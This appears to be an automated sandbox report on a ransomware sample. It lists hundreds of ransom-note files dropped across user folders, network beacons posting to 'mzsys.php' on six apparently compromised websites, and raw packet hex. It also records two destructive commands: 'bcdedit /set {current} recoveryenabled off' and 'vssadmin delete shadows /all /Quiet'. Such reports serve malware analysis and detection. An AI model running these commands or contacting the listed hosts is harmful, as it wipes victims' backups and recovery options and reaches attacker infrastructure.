Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\TypeSupport\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Favorites\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\System Tools\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_20130508_125854937-MSI_vc_red.msi.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\excel4.xls
Creates FileC:\Documents and Settings\Administrator\Templates\wordpfct.wpd
Creates FileC:\Documents and Settings\Administrator\Favorites\Links\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Videos\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Favorites\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Games\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+jha.html
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Color\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Administrative Tools\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Startup\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Identities\{66520883-AF04-4437-A539-3E2F2944B956}\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\NetHood\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+jha.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\Themes\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Updater\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications\HELP_RECOVER_instructions+jha.png
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+jha.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+jha.html
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   61737365 74732f65 6d61696c 5f746d70   assets/email_tmp
0x00000020 (00032)   6c2f7570 6c6f6164 732f6d7a 7379732e   l/uploads/mzsys.
0x00000030 (00048)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000040 (00064)   63657074 3a208d8d f8dfffff 682c202c   cept: ......h, ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000070 (00112)   202c202c 202c202c 202c200d 0a436f6e    , , , , , ..Con
0x00000080 (00128)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000090 (00144)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x000000a0 (00160)   6d2d7572 6c656e63 6f646564 0d0a5573   m-urlencoded..Us
0x000000b0 (00176)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000c0 (00192)   612f352e 30202857 696e646f 7773204e   a/5.0 (Windows N
0x000000d0 (00208)   5420362e 333b2057 4f573634 3b205472   T 6.3; WOW64; Tr
0x000000e0 (00224)   6964656e 742f372e 303b2054 6f756368   ident/7.0; Touch
0x000000f0 (00240)   3b207276 3a31312e 3029206c 696b6520   ; rv:11.0) like 
0x00000100 (00256)   4765636b 6f0d0a48 6f73743a 20686e62   Gecko..Host: hnb
0x00000110 (00272)   2e6e6574 0d0a436f 6e74656e 742d4c65   .net..Content-Le
0x00000120 (00288)   6e677468 3a203634 350d0a43 61636865   ngth: 645..Cache
0x00000130 (00304)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000140 (00320)   68650d0a 0d0a6461 74613d32 30313832   he....data=20182
0x00000150 (00336)   31463334 43363344 38323032 43413438   1F34C63D8202CA48
0x00000160 (00352)   32333738 33353742 44303441 41343833   2378357BD04AA483
0x00000170 (00368)   45343744 30454241 45433846 37353745   E47D0EBAEC8F757E
0x00000180 (00384)   38363546 38333936 39304439 38323845   865F839690D9828E
0x00000190 (00400)   33443545 44314131 31353043 45394434   3D5ED1A1150CE9D4
0x000001a0 (00416)   42303030 39464531 34383932 45433046   B0009FE14892EC0F
0x000001b0 (00432)   32414233 32363734 44463334 46443535   2AB32674DF34FD55
0x000001c0 (00448)   35394237 39463634 41324342 33394431   59B79F64A2CB39D1
0x000001d0 (00464)   43384633 46354442 38333242 32353530   C8F3F5DB832B2550
0x000001e0 (00480)   32304231 41453742 30443433 33443637   20B1AE7B0D433D67
0x000001f0 (00496)   45363643 44433346 33323637 37323041   E66CDC3F3267720A
0x00000200 (00512)   37434630 30333642 35443245 37383738   7CF0036B5D2E7878
0x00000210 (00528)   39363539 39354434 34443032 33454332   965995D44D023EC2
0x00000220 (00544)   41333445 39394232 33364431 37393642   A34E99B236D1796B
0x00000230 (00560)   46424537 34303045 45323842 41304441   FBE7400EE28BA0DA
0x00000240 (00576)   41393130 46324245 44374536 30394134   A910F2BED7E609A4
0x00000250 (00592)   42374531 38353333 36313336 36444143   B7E1853361366DAC
0x00000260 (00608)   37413339 41433134 31463230 44353345   7A39AC141F20D53E
0x00000270 (00624)   44373139 43333735 46343143 45383739   D719C375F41CE879
0x00000280 (00640)   39343436 37344330 37393538 42393834   944674C07958B984
0x00000290 (00656)   36363245 38434430 43373043 39414543   662E8CD0C70C9AEC
0x000002a0 (00672)   33343231 39464639 42443945 41393442   34219FF9BD9EA94B
0x000002b0 (00688)   30443739 41384639 45303638 30333936   0D79A8F9E0680396
0x000002c0 (00704)   37333333 37423833 37313630 34373044   73337B837160470D
0x000002d0 (00720)   45313930 45314333 32384343 42373034   E190E1C328CCB704
0x000002e0 (00736)   39454334 42324232 30413433 44354335   9EC4B2B20A43D5C5
0x000002f0 (00752)   33323232 35353137 38423643 32364330   322255178B6C26C0
0x00000300 (00768)   44334238 39363235 36373445 36394635   D3B89625674E69F5
0x00000310 (00784)   36374442 36413942 41394630 38353937   67DB6A9BA9F08597
0x00000320 (00800)   41324641 44464337 36383031 36314243   A2FADFC7680161BC
0x00000330 (00816)   37444144 30394243 41364132 39463338   7DAD09BCA6A29F38
0x00000340 (00832)   42384141 36373939 44424544 45384532   B8AA6799DBEDE8E2
0x00000350 (00848)   45304533 32373639 41353842 44363634   E0E32769A58BD664
0x00000360 (00864)   32414233 33304433 35463339 39363139   2AB330D35F399619
0x00000370 (00880)   46423338 44413743 34334431 35333532   FB38DA7C43D15352
0x00000380 (00896)   37463738 41343731 44324633 45443233   7F78A471D2F3ED23
0x00000390 (00912)   33303731 41353335 36394437 36464546   3071A53569D76FEF
0x000003a0 (00928)   34443730 42313533 36453232 31393731   4D70B1536E221971
0x000003b0 (00944)   43314635 41343730 37383933 34324445   C1F5A470789342DE
0x000003c0 (00960)   41394545 34393236 383031              A9EE4926801

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f636d 73636f72 652f6d7a 7379732e   d_cmscore/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a208d8d f8dfffff 682c202c   cept: ......h, ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 202c200d 0a436f6e    , , , , , ..Con
0x00000070 (00112)   74656e74 2d547970 653a2061 70706c69   tent-Type: appli
0x00000080 (00128)   63617469 6f6e2f78 2d777777 2d666f72   cation/x-www-for
0x00000090 (00144)   6d2d7572 6c656e63 6f646564 0d0a5573   m-urlencoded..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f352e 30202857 696e646f 7773204e   a/5.0 (Windows N
0x000000c0 (00192)   5420362e 333b2057 4f573634 3b205472   T 6.3; WOW64; Tr
0x000000d0 (00208)   6964656e 742f372e 303b2054 6f756368   ident/7.0; Touch
0x000000e0 (00224)   3b207276 3a31312e 3029206c 696b6520   ; rv:11.0) like 
0x000000f0 (00240)   4765636b 6f0d0a48 6f73743a 20666972   Gecko..Host: fir
0x00000100 (00256)   65636865 65726c65 61646572 732e6672   echeerleaders.fr
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000130 (00304)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000140 (00320)   0d0a6461 74613d32 30313832 31463334   ..data=201821F34
0x00000150 (00336)   43363344 38323032 43413438 32333738   C63D8202CA482378
0x00000160 (00352)   33353742 44303441 41343833 45343744   357BD04AA483E47D
0x00000170 (00368)   30454241 45433846 37353745 38363546   0EBAEC8F757E865F
0x00000180 (00384)   38333936 39304439 38323845 33443545   839690D9828E3D5E
0x00000190 (00400)   44314131 31353043 45394434 42303030   D1A1150CE9D4B000
0x000001a0 (00416)   39464531 34383932 45433046 32414233   9FE14892EC0F2AB3
0x000001b0 (00432)   32363734 44463334 46443535 35394237   2674DF34FD5559B7
0x000001c0 (00448)   39463634 41324342 33394431 43384633   9F64A2CB39D1C8F3
0x000001d0 (00464)   46354442 38333242 32353530 32304231   F5DB832B255020B1
0x000001e0 (00480)   41453742 30443433 33443637 45363643   AE7B0D433D67E66C
0x000001f0 (00496)   44433346 33323637 37323041 37434630   DC3F3267720A7CF0
0x00000200 (00512)   30333642 35443245 37383738 39363539   036B5D2E78789659
0x00000210 (00528)   39354434 34443032 33454332 41333445   95D44D023EC2A34E
0x00000220 (00544)   39394232 33364431 37393642 46424537   99B236D1796BFBE7
0x00000230 (00560)   34303045 45323842 41304441 41393130   400EE28BA0DAA910
0x00000240 (00576)   46324245 44374536 30394134 42374531   F2BED7E609A4B7E1
0x00000250 (00592)   38353333 36313336 36444143 37413339   853361366DAC7A39
0x00000260 (00608)   41433134 31463230 44353345 44373139   AC141F20D53ED719
0x00000270 (00624)   43333735 46343143 45383739 39343436   C375F41CE8799446
0x00000280 (00640)   37344330 37393538 42393834 36363245   74C07958B984662E
0x00000290 (00656)   38434430 43373043 39414543 33343231   8CD0C70C9AEC3421
0x000002a0 (00672)   39464639 42443945 41393442 30443739   9FF9BD9EA94B0D79
0x000002b0 (00688)   41384639 45303638 30333936 37333333   A8F9E06803967333
0x000002c0 (00704)   37423833 37313630 34373044 45313930   7B837160470DE190
0x000002d0 (00720)   45314333 32384343 42373034 39454334   E1C328CCB7049EC4
0x000002e0 (00736)   42324232 30413433 44354335 33323232   B2B20A43D5C53222
0x000002f0 (00752)   35353137 38423643 32364330 44334238   55178B6C26C0D3B8
0x00000300 (00768)   39363235 36373445 36394635 36374442   9625674E69F567DB
0x00000310 (00784)   36413942 41394630 38353937 41324641   6A9BA9F08597A2FA
